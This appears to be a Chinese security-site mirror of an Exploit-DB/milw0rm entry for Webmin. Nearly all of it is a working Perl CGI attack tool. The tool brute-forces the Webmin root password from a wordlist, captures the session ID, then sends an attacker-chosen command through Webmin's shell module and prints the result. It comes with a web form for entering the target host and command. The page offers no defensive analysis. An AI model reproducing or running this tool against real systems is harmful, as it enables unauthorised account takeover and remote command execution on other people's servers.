Webmin 1.5 – Web Brute Force (CGI)

Webmin 1.5 – Web Brute Force (CGI)

漏洞ID 1054855 漏洞类型
发布时间 2005-01-08 更新时间 2005-01-08
图片[1]-Webmin 1.5 – Web Brute Force (CGI)-安全小百科CVE编号 N/A
图片[2]-Webmin 1.5 – Web Brute Force (CGI)-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/745
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl

use CGI qw(:standard);
use IO::Socket;
$CGI::HEADERS_ONCE = 1;
$CGI = new CGI;

$atak = $CGI->param("atak");
$host = $CGI->param("host");
$wlist = $CGI->param("wlist");
$cmd = $CGI->param("cmd");

print $CGI->header(-type=>'text/html',-charset=>'windows-1254');
print qq~<html><head><meta http-equiv=Content-Type" content=text/html;
charset=ISO-8859-9><title>Webmin Web Brute Force v1.5 - cgi
versiyon</title></head>
<body bgcolor=black text=red>Webmin Web Brute Force v1.5 - cgi versiyon<br>
<font color=blue>
Webmin BruteForce + Command execution- cgi version<br>
v1.0:By Di42lo  - [email protected]<br>
v1.5:By ZzagorR - [email protected] - www.rootbinbash.com<br>
</font>~;
if($atak eq "webmin") {
  open (data, "$wlist");
  @wordlist=<data>;
  close data;
  $passx=@wordlist;
  $chk=0;
  $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout  => 25) || die "[-] Webmin on this host does not
existrn";
  $sock->close;
  print "[+] BruteForcing...<br>";
  $sid;
  $n=0;
  while ($chk!=1) {
     $n++;
     if($n>$passx){
       exit;
     }
     $pass=@wordlist[$passx-$n];
     $pass_line="page=%2F&user=root&pass=$pass";
     $buffer="POST /session_login.cgi HTTP/1.0n".
     "Host: $host:10000n".
     "Keep-Alive: 300n".
     "Connection: keep-aliven".
     "Referer: http://$host:10000/n".
     "Cookie: testing=1n".
     "Content-Type: application/x-www-form-urlencodedn".
     "Content-Length: __n".
     "n".
     $pass_line."nn";
     $line_size=length($pass_line);
     $buffer=~s/__/$line_size/g;
     $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout  => 25);
     if ($sock){
        print "[+] Denenen sifre: $pass<br>";
        print $sock $buffer;
        while ($answer=<$sock>){
              if ($answer=~/sid=(.*);/g){
                 $chk=1;
                 $sid=$1;
                 print "[+] Found SID : $sid<br>";
                 print "[+] Sifre : $pass<br>";
              }
        }
     }
     $sock->close;
}
print "[+] Connecting to host once again<br>";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort
=> "10000",Timeout  => 10) || die "[-] Cant Connect once again for command
executionn";
print "[+] Connected.. Sending Buffer<br>";
$temp="-----------------------------19777347561180971495777867604n".
        "Content-Disposition: form-data; name="cmd"n".
        "n".
        "$cmdn".
        "-----------------------------19777347561180971495777867604n".
        "Content-Disposition: form-data; name="pwd"n".
        "n".
        "/rootn".
        "-----------------------------19777347561180971495777867604n".
        "Content-Disposition: form-data; name="history"n".
        "n".
        "n".
        "-----------------------------19777347561180971495777867604n".
        "Content-Disposition: form-data; name="previous"n".
        "n".
        "$cmdn".
        "-----------------------------19777347561180971495777867604n".
        "Content-Disposition: form-data; name="pcmd"n".
        "n".
        "$cmdn".
        "-----------------------------19777347561180971495777867604--nn";
$buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1n".
       "Host: $host:10000n".
       "Keep-Alive: 300n".
       "Connection: keep-aliven".
       "Referer: http://$host:10000/shell/n".
       "Cookie: sid=$sid; testing=1; xn".
       "Content-Type: multipart/form-data;
boundary=---------------------------19777347561180971495777867604n".
       "Content-Length: sizn".
       "n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;

if ($sock){
  print "[+] Buffer sent...running command $cmd<br>";
  print $sock $buffer;
  while ($answer=<$sock>){
        if ($answer=~/defaultStatus="(.*)";/g) { print $1."<br>";}
        if ($answer=~/<td><pre><b>>/g){
           $cmd_chk=1;
        }
        if ($cmd_chk==1) {
           if ($answer=~/</pre></td></tr>/g){
              exit;
           } else {
              print $answer;
           }
        }
  }
}
}

if($atak eq ""){
print qq~
<table align=left cellspacing="0" cellpading="0"><form aciton=?><input
type=hidden name=atak value=webmin>
<tr><td colspan="3" align=center>Webmin Web Brute Force v1.5 - cgi
version</td></tr>
<tr><td>Server:</td><td colspan="2"><input type="text" name="host" size="50"
value="www."></td></tr>
<tr><td valign="top">Wordlist:</td><td valign="top"><input type="file"
name="wlist"></td><td valign="top"
align="left">Examples:<br>---------<br>admin<br>administrator<br>redhat<br>mandrake<br>suse<br></td></tr>
<tr><td>Cmd:</td><td colspan="2"><input type="text" name="cmd" size="50"
value="uptime"></td></tr>
<tr><td colspan="3" align="center"><input type="submit" name=""
value="Gooooooo!"></td></tr>
</form></table></body></html>~;
}

# milw0rm.com [2005-01-08]

相关推荐: Super Site Searcher Remote Command Execution Vulnerability

Super Site Searcher Remote Command Execution Vulnerability 漏洞ID 1101566 漏洞类型 Input Validation Error 发布时间 2002-09-03 更新时间 2002-09-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享